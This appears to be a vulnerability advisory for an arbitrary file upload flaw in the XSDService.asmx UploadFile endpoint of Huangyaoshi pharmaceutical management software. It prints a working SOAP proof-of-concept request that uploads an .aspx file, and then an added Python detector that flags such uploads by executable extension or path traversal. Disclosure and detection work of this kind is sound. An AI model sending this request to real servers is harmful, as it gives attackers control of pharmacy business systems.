Arbitrary File Upload Vulnerability in xsdservice of Huangyaoshi Pharmaceutical Management Software (黄药师药业管理软件)

Date: 2024-12-30 | Affected software: Huangyaoshi Pharmaceutical Management Software (黄药师药业管理软件) | PoC: public

Vulnerability description

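Huangyaoshi Pharmaceutical Management Software is a comprehensive management package designed for the pharmaceutical industry, used by drug wholesalers, pharmacy chains, retail pharmacies and similar businesses. The software has an arbitrary file upload vulnerability through which an attacker can gain server privileges.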

PoC code

POST /XSDService.asmx HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 1943
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/UploadFile"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <UploadFile xmlns="http://tempuri.org/">
      <filePath>2</filePath>
      <fileName>33553.aspx</fileName>
      <buffer>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</buffer>
      <Offset>1</Offset>
    </UploadFile>
  </soap:Body>
</soap:Envelope>
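
Added example (not part of the original advisory and not the vendor's code): a Python check a defender could run over captured requests or proxy logs to flag UploadFile calls to /XSDService.asmx whose fileName carries a server-executable extension or a path traversal. The extension list, the host name and the buffer value in the sample are assumptions constructed for illustration.

```python
import os
import xml.etree.ElementTree as ET

NS = {"soap": "http://schemas.xmlsoap.org/soap/envelope/", "t": "http://tempuri.org/"}
# Assumption: extensions the IIS/ASP.NET host would execute or interpret; tune per server.
EXECUTABLE_EXT = {".aspx", ".ashx", ".asmx", ".asp", ".cshtml", ".config"}

def inspect_request(raw: str) -> list:
    """Return the reasons a raw HTTP request is a suspicious UploadFile call."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n")[0].split()
    if len(parts) < 2 or parts[0] != "POST" or parts[1].split("?")[0].lower() != "/xsdservice.asmx":
        return []
    if "<!DOCTYPE" in body.upper():  # never expand entities from untrusted traffic
        return ["DOCTYPE in SOAP body (not parsed)"]
    try:
        root = ET.fromstring(body.strip().encode("utf-8"))
    except ET.ParseError:
        return ["malformed SOAP body sent to XSDService.asmx"]
    call = root.find("soap:Body/t:UploadFile", NS)
    if call is None:
        return []
    file_name = (call.findtext("t:fileName", "", NS) or "").strip()
    file_path = (call.findtext("t:filePath", "", NS) or "").strip()
    reasons = []
    # Normalise the way Windows does (trailing dots/spaces are dropped) before comparing.
    ext = os.path.splitext(file_name.rstrip(". ").lower())[1]
    if ext in EXECUTABLE_EXT:
        reasons.append(f"server-executable extension {ext}")
    if ".." in file_path or any(tok in file_name for tok in ("..", "/", "\\")):
        reasons.append("path separator or traversal in fileName/filePath")
    return reasons

# Constructed sample: same shape as the request above, with a harmless placeholder buffer.
SAMPLE = """POST /XSDService.asmx HTTP/1.1
Host: erp.example.internal
SOAPAction: "http://tempuri.org/UploadFile"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body><UploadFile xmlns="http://tempuri.org/">
      <filePath>2</filePath>
      <fileName>33553.aspx</fileName>
      <buffer>QUJD</buffer>
  </UploadFile></soap:Body>
</soap:Envelope>
"""

if __name__ == "__main__":
    print(inspect_request(SAMPLE))
```

The same allow-list logic belongs on the server side of UploadFile; at the network edge it serves as a detection or blocking rule until the service is fixed.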
